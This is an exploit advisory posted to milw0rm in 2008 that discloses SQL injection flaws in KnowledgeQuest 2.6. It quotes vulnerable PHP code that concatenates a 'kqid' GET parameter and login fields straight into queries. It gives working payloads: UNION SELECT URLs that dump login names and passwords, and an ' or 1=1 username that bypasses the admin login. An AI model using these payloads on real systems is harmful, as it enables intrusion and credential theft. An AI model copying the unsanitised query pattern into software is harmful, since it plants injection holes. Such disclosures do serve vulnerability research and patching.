########################################################################
# #
# ...:::::KnowledgeQuest 2.6 SQL Injection Vulnerabilities ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-------
vuln code in articletext.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17: $result = mysql_query("select DATE_FORMAT(postdate,'%m-%d-%y') as postdate, DATE_FORMAT(reveiwdate,'%m-%d-%y') as reveiwdate, categoryid,title,text, attach, kqid, authorid from knowledgebase where kqid=" .$kqid.mysql_error());
###########
vuln code in articletextonly.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17:$result = mysql_query("select * from knowledgebase where kqid=" .$kqid.mysql_error());
--------
Exploits:
http://www.site.com/[patch]/articletextonly.php?kqid=-9999/**/union/**/select/**/1,2,3,loginid,password,6,7,8,9,10,11/**/from/**/login/*
http://www.site.com/[patch]/articletext.php?kqid=-999/**/union/**/select/**/1,2,3,loginid,password,6,7,8/**/from/**/login/*
--------------------------------
.::::admin Authentication bypass vuln::::.
vuln code in logincheck.php:
if(!empty($_POST['username']))
{
$username = $_POST['username'];
}
if(!empty($_POST['password']))
{
$password = $_POST['password'];
}
...
...
...
$sql = "select * from login where loginid='". $username ."' and password='". $password . "'";
-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
//you must login in administratorlogin.php ;)
--------------
young iranian h4ck3rz
# milw0rm.com [2008-04-09]
